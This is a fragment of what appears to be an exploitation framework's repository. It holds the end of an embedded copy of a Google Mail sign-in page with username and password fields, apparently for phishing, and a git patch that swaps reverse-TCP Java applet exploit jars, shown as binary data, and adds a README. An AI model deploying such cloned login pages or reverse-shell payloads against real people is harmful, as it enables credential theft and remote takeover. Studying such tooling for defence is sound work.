rgba(0,0,0,.14),inset -1px 0 0 rgba(0,0,0,.07);   }   .jfk-scrollbar::-webkit-scrollbar-track:horizontal:active {   -webkit-box-shadow: inset 0 1px 0 rgba(0,0,0,.14),inset 0 -1px 0 rgba(0,0,0,.07);   box-shadow: inset 0 1px 0 rgba(0,0,0,.14),inset 0 -1px 0 rgba(0,0,0,.07);   }   .jfk-scrollbar-dark.jfk-scrollbar::-webkit-scrollbar-track:hover {   background-color: rgba(255,255,255,.1);   -webkit-box-shadow: inset 1px 0 0 rgba(255,255,255,.2);   box-shadow: inset 1px 0 0 rgba(255,255,255,.2);   }   .jfk-scrollbar-dark.jfk-scrollbar::-webkit-scrollbar-track:horizontal:hover {   -webkit-box-shadow: inset 0 1px 0 rgba(255,255,255,.2);   box-shadow: inset 0 1px 0 rgba(255,255,255,.2);   }   .jfk-scrollbar-dark.jfk-scrollbar::-webkit-scrollbar-track:active {   background-color: rgba(255,255,255,.1);   -webkit-box-shadow: inset 1px 0 0 rgba(255,255,255,.25),inset -1px 0 0 rgba(255,255,255,.15);   box-shadow: inset 1px 0 0 rgba(255,255,255,.25),inset -1px 0 0 rgba(255,255,255,.15);   }   .jfk-scrollbar-dark.jfk-scrollbar::-webkit-scrollbar-track:horizontal:active {   -webkit-box-shadow: inset 0 1px 0 rgba(255,255,255,.25),inset 0 -1px 0 rgba(255,255,255,.15);   box-shadow: inset 0 1px 0 rgba(255,255,255,.25),inset 0 -1px 0 rgba(255,255,255,.15);   }   .jfk-scrollbar::-webkit-scrollbar-thumb {   background-color: rgba(0,0,0,.2);   background-clip: padding-box;   border: solid transparent;   border-width: 0 0 0 7px;   min-height: 28px;   padding: 100px 0 0;   -webkit-box-shadow: inset 1px 1px 0 rgba(0,0,0,.1),inset 0 -1px 0 rgba(0,0,0,.07);   box-shadow: inset 1px 1px 0 rgba(0,0,0,.1),inset 0 -1px 0 rgba(0,0,0,.07);   }   .jfk-scrollbar::-webkit-scrollbar-thumb:horizontal {   border-width: 7px 0 0;   padding: 0 0 0 100px;   -webkit-box-shadow: inset 1px 1px 0 rgba(0,0,0,.1),inset -1px 0 0 rgba(0,0,0,.07);   box-shadow: inset 1px 1px 0 rgba(0,0,0,.1),inset -1px 0 0 rgba(0,0,0,.07);   }   .jfk-scrollbar::-webkit-scrollbar-thumb:hover {   background-color: rgba(0,0,0,.4);   -webkit-box-shadow: inset 1px 1px 1px rgba(0,0,0,.25);   box-shadow: inset 1px 1px 1px rgba(0,0,0,.25);   }   .jfk-scrollbar::-webkit-scrollbar-thumb:active {   background-color: rgba(0,0,0,0.5);   -webkit-box-shadow: inset 1px 1px 3px rgba(0,0,0,0.35);   box-shadow: inset 1px 1px 3px rgba(0,0,0,0.35);   }   .jfk-scrollbar-dark.jfk-scrollbar::-webkit-scrollbar-thumb {   background-color: rgba(255,255,255,.3);   -webkit-box-shadow: inset 1px 1px 0 rgba(255,255,255,.15),inset 0 -1px 0 rgba(255,255,255,.1);   box-shadow: inset 1px 1px 0 rgba(255,255,255,.15),inset 0 -1px 0 rgba(255,255,255,.1);   }   .jfk-scrollbar-dark.jfk-scrollbar::-webkit-scrollbar-thumb:horizontal {   -webkit-box-shadow: inset 1px 1px 0 rgba(255,255,255,.15),inset -1px 0 0 rgba(255,255,255,.1);   box-shadow: inset 1px 1px 0 rgba(255,255,255,.15),inset -1px 0 0 rgba(255,255,255,.1);   }   .jfk-scrollbar-dark.jfk-scrollbar::-webkit-scrollbar-thumb:hover {   background-color: rgba(255,255,255,.6);   -webkit-box-shadow: inset 1px 1px 1px rgba(255,255,255,.37);   box-shadow: inset 1px 1px 1px rgba(255,255,255,.37);   }   .jfk-scrollbar-dark.jfk-scrollbar::-webkit-scrollbar-thumb:active {   background-color: rgba(255,255,255,.75);   -webkit-box-shadow: inset 1px 1px 3px rgba(255,255,255,.5);   box-shadow: inset 1px 1px 3px rgba(255,255,255,.5);   }   .jfk-scrollbar-borderless.jfk-scrollbar::-webkit-scrollbar-track {   border-width: 0 1px 0 6px;   }   .jfk-scrollbar-borderless.jfk-scrollbar::-webkit-scrollbar-track:horizontal {   border-width: 6px 0 1px;   }   .jfk-scrollbar-borderless.jfk-scrollbar::-webkit-scrollbar-track:hover {   background-color: rgba(0,0,0,.035);   -webkit-box-shadow: inset 1px 1px 0 rgba(0,0,0,.14),inset -1px -1px 0 rgba(0,0,0,.07);   box-shadow: inset 1px 1px 0 rgba(0,0,0,.14),inset -1px -1px 0 rgba(0,0,0,.07);   }   .jfk-scrollbar-borderless.jfk-scrollbar-dark.jfk-scrollbar::-webkit-scrollbar-track:hover {   background-color: rgba(255,255,255,.07);   -webkit-box-shadow: inset 1px 1px 0 rgba(255,255,255,.25),inset -1px -1px 0 rgba(255,255,255,.15);   box-shadow: inset 1px 1px 0 rgba(255,255,255,.25),inset -1px -1px 0 rgba(255,255,255,.15);   }   .jfk-scrollbar-borderless.jfk-scrollbar::-webkit-scrollbar-thumb {   border-width: 0 1px 0 6px;   }   .jfk-scrollbar-borderless.jfk-scrollbar::-webkit-scrollbar-thumb:horizontal {   border-width: 6px 0 1px;   }   .jfk-scrollbar::-webkit-scrollbar-corner {   background: transparent;   }   body.jfk-scrollbar::-webkit-scrollbar-track-piece {   background-clip: padding-box;   background-color: #f1f1f1;   border: solid #fff;   border-width: 0 0 0 3px;   -webkit-box-shadow: inset 1px 0 0 rgba(0,0,0,.14),inset -1px 0 0 rgba(0,0,0,.07);   box-shadow: inset 1px 0 0 rgba(0,0,0,.14),inset -1px 0 0 rgba(0,0,0,.07);   }   body.jfk-scrollbar::-webkit-scrollbar-track-piece:horizontal {   border-width: 3px 0 0;   -webkit-box-shadow: inset 0 1px 0 rgba(0,0,0,.14),inset 0 -1px 0 rgba(0,0,0,.07);   box-shadow: inset 0 1px 0 rgba(0,0,0,.14),inset 0 -1px 0 rgba(0,0,0,.07);   }   body.jfk-scrollbar::-webkit-scrollbar-thumb {   border-width: 1px 1px 1px 5px;   }   body.jfk-scrollbar::-webkit-scrollbar-thumb:horizontal {   border-width: 5px 1px 1px;   }   body.jfk-scrollbar::-webkit-scrollbar-corner {   background-clip: padding-box;   background-color: #f1f1f1;   border: solid #fff;   border-width: 3px 0 0 3px;   -webkit-box-shadow: inset 1px 1px 0 rgba(0,0,0,.14);   box-shadow: inset 1px 1px 0 rgba(0,0,0,.14);   }   .errormsg {   margin: .5em 0 0;   display: block;   color: #dd4b39;   line-height: 17px;   }   .help-link {   background: #dd4b39;   padding: 0 5px;   color: #fff;   font-weight: bold;   display: inline-block;   -webkit-border-radius: 1em;   -moz-border-radius: 1em;   border-radius: 1em;   text-decoration: none;   position: relative;   top: 0px;   }   .help-link:visited {   color: #fff;   }   .help-link:hover {   color: #fff;   background: #c03523;   text-decoration: none;   }   .help-link:active {   opacity: 1;   background: #ae2817;   } </style> <style type='text/css'>   .main {   width: auto;   max-width: 1000px;   min-width: 780px;   }   .product-info {   margin: 0 385px 0 0;   }   .product-info h3 {   font-size: 1.23em;   font-weight: normal;   }   .product-info a:visited {   color: #61c;   }   .product-info .g-button:visited {   color: #666;   }   .sign-in {   width: 335px;   float: right;   }   .signin-box,   .accountchooser-box {   margin: 12px 0 0;   padding: 20px 25px 15px;   background: #f1f1f1;   border: 1px solid #e5e5e5;   }   .product-headers {   margin: 0 0 1.5em;   }   .product-headers h1 {   font-size: 25px;   margin: 0 !important;   }   .product-headers h2 {   font-size: 16px;   margin: .4em 0 0;   }   .features {   overflow: hidden;   margin: 2em 0 0;   }   .features li {   margin: 3px 0 2em;   }   .features img {   float: left;   margin: -3px 0 0;   }   .features p {   margin: 0 0 0 68px;   }   .features .title {   font-size: 16px;   margin-bottom: .3em;   }   .features.no-icon p {   margin: 0;   }   .features .small-title {   font-size: 1em;   font-weight: bold;   }   .notification-bar {   background: #f9edbe;   padding: 8px;   } </style> <style type='text/css'>   .signin-box h2 {   font-size: 16px;   line-height: 17px;   height: 16px;   margin: 0 0 1.2em;   position: relative;   }   .signin-box h2 strong {   display: inline-block;   position: absolute;   right: 0;   top: 1px;   height: 19px;   width: 52px;   background: transparent url(//ssl.gstatic.com/accounts/ui/google-signin-flat.png) no-repeat;   }   .signin-box div {   margin: 0 0 1.5em;   }   .signin-box label {   display: block;   }   .signin-box input[type=text],   .signin-box input[type=password] {   width: 100%;   height: 32px;   font-size: 15px;   direction: ltr;   }   .signin-box .email-label,   .signin-box .passwd-label {   font-weight: bold;   margin: 0 0 .5em;   display: block;   -webkit-user-select: none;   -moz-user-select: none;   user-select: none;   }   .signin-box .reauth {   display: inline-block;   font-size: 15px;   height: 29px;   line-height: 29px;   margin: 0;   }   .signin-box label.remember {   display: inline-block;   vertical-align: top;   margin: 9px 0 0;   }   .signin-box .remember-label {   font-weight: normal;   color: #666;   line-height: 0;   padding: 0 0 0 .4em;   -webkit-user-select: none;   -moz-user-select: none;   user-select: none;   }   .signin-box input[type=submit] {   margin: 0 1.5em 1.2em 0;   height: 32px;   font-size: 13px;   }   .signin-box ul {   margin: 0;   }   .signin-box .training-msg {   padding: .5em 8px;   background: #f9edbe;   }   .signin-box .training-msg p {   margin: 0 0 .5em;   } </style>   <style type='text/css'> .mail .mailPromo {   border: 1px solid #ebebeb;   margin-top: 25px;   padding: 10px 10px 0px 10px; } .mail .mailPromoIcon {   float: left;   padding-bottom: 10px;   padding-right: 9px; } .mail .mailPromoNew {   color: red; } .mail .mailPromoIconLarge {   float: left;   padding-bottom: 10px;   padding-right: 9px;   margin-top: 0px; } .mail .mailPromoHead {   padding-top: 7px;   padding-bottom: 0;   margin-bottom: 5px; } .mail .mailPromoBody {   padding-top: 4px;   margin-bottom: 10px; } .mail ul.mail-links {   list-style: none;   margin: 0;   overflow: hidden; } .mail ul.mail-links li {   float: left;   margin: 0 20px 0 0; } </style> <link rel='publisher' href='https://plus.google.com/103345707817934461425' />   </head>   <body>   <div class='wrapper'>   <div class='google-header-bar'>   <div class='header content clearfix'>   <img class='logo' src='//ssl.gstatic.com/images/logos/google_logo_41.png' alt='Google'>   <span class='signup-button'>   New to Google Mail?   <a id='link-signup' class='g-button g-button-red' href='https://accounts.google.com/SignUp?service=mail&amp;continue=https%3A%2F%2Fmail.google.com%2Fmail%2F%3Ftab%3Dmm&amp;ltmpl=googlemail'>   Create an account   </a>   </span>   </div>   </div>   <div class='main content clearfix'>   <div class='sign-in'> <div class='signin-box'>   <h2>Sign in <strong></strong></h2>   <form id='gaia_loginform' action='javascript:void(0);' method='post'>   <input type='hidden'            name='continue' id='continue' value='https://mail.google.com/mail/?tab=mm'      >   <input type='hidden'            name='service' id='service' value='mail'      >   <input type='hidden'            name='rm' id='rm' value='false'      >   <input type='hidden'            name='dsh' id='dsh' value='-2663017759600220251'      >   <input type='hidden'            name='ltmpl' id='ltmpl' value='googlemail'      >   <input type='hidden'            name='scc' id='scc' value='1'      >   <input type='hidden'          name='GALX'          value='FVvSTtLIZzE'>   <input type='hidden'     id='pstMsg'     name='pstMsg'     value='0'>   <input type='hidden'     id='dnConn'     name='dnConn'     value=''>   <input type='hidden'     id='checkConnection'     name='checkConnection'     value=''>   <input type='hidden'     id='checkedDomains'     name='checkedDomains'     value='youtube'> <input type='hidden' name='timeStmp' id='timeStmp'        value=''/> <input type='hidden' name='secTok' id='secTok'        value=''/> <div class='email-div'>   <label for='Email'><strong class='email-label'>Username</strong></label>   <input type='text' spellcheck='false'             name='Email' id='Email' value=''                 > </div> <div class='passwd-div'>   <label for='Passwd'><strong class='passwd-label'>Password</strong></label>   <input type='password' name='Passwd' id='Passwd'                  > </div>   <input type='submit' class='g-button g-button-submit' name='signIn' id='signIn' onclick='clickedSubmitButton()' value='Sign in'>   <label class='remember' onclick=''>   <input type='checkbox'    name='PersistentCookie' id='PersistentCookie' value='yes'         >   <strong class='remember-label'>   Stay signed in   </strong>   </label>   <input type='hidden' name='rmShown' value='1'>   </form>   <ul>   <li>   <a id='link-forgot-passwd'           href='https://accounts.google.com/RecoverAccount?service=mail&amp;continue=https%3A%2F%2Fmail.google.com%2Fmail%2F%3Ftab%3Dmm'           target='_top'>   Can&#39;t access your account?   </a>   </li>   </ul> </div>   </div>   <div class='product-info mail'> <div class='product-headers'>   <h1 class='redtext'>Google Mail</h1>   <h2>A Google approach to email.</h2> </div>   <p>   Google Mail is built on the idea that email can be more intuitive, efficient, and useful. And maybe even fun. After all, Google Mail has: </p> <ul class='features'>   <li>   <img src='//ssl.gstatic.com/images/icons/feature/filing_cabinet-g42.png' alt=''>   <p class='title'>Lots of space</p>   <p>   Over <span id=quota>2757.272164</span> megabytes (and counting) of free storage.   </p>   </li>   <li>   <img src='//ssl.gstatic.com/images/icons/feature/nosign-r42.png' alt=''>   <p class='title'>Less spam</p>   <p>Keep unwanted messages out of your inbox.</p>   </li>   <li>   <img src='//ssl.gstatic.com/images/icons/feature/mobile_phone-42.gif' alt=''>   <p class='title'>Mobile access</p>   <p>Get Google Mail on your mobile phone. <a href='http://www.google.com/intl/en_DE/mobile/mail/#utm_source=en_DE-cpp-g4mc-gmhp&utm_medium=cpp&utm_campaign=en_DE'>Learn more</a></p>   </li> </ul> <ul class='mail-links'>   <li><a href='http://mail.google.com/mail/help/intl/en/about.html' onclick='_gaq.push(['_link', 'http://mail.google.com/mail/help/intl/en/about.html', 'true']); return false;'>   About Google Mail</a></li>   <li><a href='http://mail.google.com/mail/help/intl/en/about_whatsnew.html' onclick='_gaq.push(['_link', 'http://mail.google.com/mail/help/about_whatsnew.html', 'true']); return false;'>New features!</a></li>   <li><a href='http://mail.google.com/mail/help/intl/en/switch.html' onclick='_gaq.push(['_link', 'http://mail.google.com/mail/help/intl/en/switch.html', 'true']); return false;'>Switch to Google Mail</a></li>   <li>   <a href='https://accounts.google.com/SignUp?service=mail&continue=https%3A%2F%2Fmail.google.com%2Fmail%2F%3Ftab%3Dmm&ltmpl=googlemail'>   Create an account   </a>   </li> </ul>   <div class='mailPromo'>   <img src='//ssl.gstatic.com/images/icons/product/apps-64.png' class='mailPromoIcon'>   <h4>Take Google Mail to work with Google Apps for Business</h4>   <p class='mailPromoBody'>Love Google Mail, but looking for a custom email address for your company?<br>   Get business email, calendar, and online docs @your_company.com.   <a href='http://www.google.com/apps/intl/en/business/gmail.html#utm_campaign=en&amp;utm_source=gmail_en_US&amp;utm_medium=et&amp;utm_term=login_promo'>   Learn more</a></p>   </div>   </div>   <div id='cc_iframe_parent'></div>   </div> <div class='google-footer-bar'>   <div class='footer content clearfix'>   <ul>   <li>© 2012 Google</li>   <li><a href='http://www.google.com/apps/intl/en/business/gmail.html#utm_medium=et&utm_source=gmail-signin-en&utm_campaign=crossnav' target='_blank'>Google Mail for Work</a></li>   <li><a href='http://mail.google.com/mail/help/intl/en/terms.html' target='_blank'>Terms &amp; Privacy</a></li>   <li><a href='http://mail.google.com/support/?hl=en' target='_blank'>Help</a></li>   </ul>   <form>   <select id='lang-chooser' class='lang-chooser' style='display: none;'>   <option value='ms'          >   Bahasa Malaysia   </option>   <option value='ca'          >   Català   </option>   <option value='cy'          >   Cymraeg   </option>   <option value='da'          >   Dansk   </option>   <option value='de'          >   Deutsch   </option>   <option value='en'         selected='selected' >   English   </option>   <option value='en-GB'          >   English (UK)   </option>   <option value='es'          >   Español   </option>   <option value='es-419'          >   Español de Latinoamérica   </option>   <option value='eu'          >   Euskara   </option>   <option value='fil'          >   Filipino   </option>   <option value='fr'          >   Français   </option>   <option value='hr'          >   Hrvatski   </option>   <option value='in'          >   Indonesia   </option>   <option value='it'          >   Italiano   </option>   <option value='sw'          >   Kiswahili   </option>   <option value='lv'          >   Latviešu valoda   </option>   <option value='lt'          >   Lietuvių   </option>   <option value='nl'          >   Nederlands   </option>   <option value='no'          >   Norsk   </option>   <option value='pt-BR'          >   Português (Brasil)   </option>   <option value='pt-PT'          >   Português (Portugal)   </option>   <option value='ro'          >   Română   </option>   <option value='sk'          >   Slovenčina   </option>   <option value='sl'          >   Slovenščina   </option>   <option value='sv'          >   Svenska   </option>   <option value='tl'          >   Tagalog   </option>   <option value='vi'          >   Tiếng Việt   </option>   <option value='tr'          >   Türkçe   </option>   <option value='et'          >   eesti keel   </option>   <option value='hu'          >   magyar   </option>   <option value='pl'          >   polski   </option>   <option value='fi'          >   suomi   </option>   <option value='is'          >   íslenska   </option>   <option value='cs'          >   čeština   </option>   <option value='el'          >   Ελληνικά   </option>   <option value='ru'          >   Русский   </option>   <option value='uk'          >   Українська   </option>   <option value='bg'          >   български   </option>   <option value='sr'          >   српски   </option>   <option value='iw'          >   עברית   </option>   <option value='ur'          >   اردو   </option>   <option value='ar'          >   العربية   </option>   <option value='fa'          >   فارسی   </option>   <option value='mr'          >   मराठी   </option>   <option value='hi'          >   हिंदी   </option>   <option value='bn'          >   বাংলা   </option>   <option value='gu'          >   ગુજરાતી   </option>   <option value='ta'          >   தமிழ்   </option>   <option value='te'          >   తెలుగు   </option>   <option value='kn'          >   ಕನ್ನಡ   </option>   <option value='ml'          >   മലയാളം   </option>   <option value='th'          >   ไทย   </option>   <option value='am'          >   አማርኛ   </option>   <option value='zh-TW'          >   中文 (繁體)   </option>   <option value='zh-CN'          >   中文（简体）   </option>   <option value='ja'          >   日本語   </option>   <option value='ko'          >   한국어   </option>   </select>   </form>   </div> </div>      </div>   </body> </html> ";
 }

From 222cff3f1dd173b32f0d466610e5340715cce300 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Sat, 6 Apr 2013 12:29:05 +0100
Subject: [PATCH 260/397] Added a README file for the JavaPaylod signed applet
 exploit.

---
 .../java_payload/AppletReverseTCP-0.2.jar     | Bin 4781 -> 0 bytes
 .../java_payload/AppletReverseTCP-0.3rc1.jar  | Bin 6029 -> 0 bytes
 .../java_payload/Applet_ReverseTCP.jar        | Bin 0 -> 6290 bytes
 .../local_host/java_payload/README.txt        |  50 ++++++++++++++++++
 .../local_host/java_payload/config.yaml       |   1 -
 .../local_host/java_payload/module.rb         |   2 +-
 6 files changed, 51 insertions(+), 2 deletions(-)
 delete mode 100644 modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar
 delete mode 100644 modules/exploits/local_host/java_payload/AppletReverseTCP-0.3rc1.jar
 create mode 100644 modules/exploits/local_host/java_payload/Applet_ReverseTCP.jar
 create mode 100644 modules/exploits/local_host/java_payload/README.txt

diff --git a/modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar b/modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar
deleted file mode 100644
index 8959c4ed9cac88cfb8aa113d7df2d38cb226e3a4..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 4781
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
My!ndDWVfe(0SZe|?*IS*

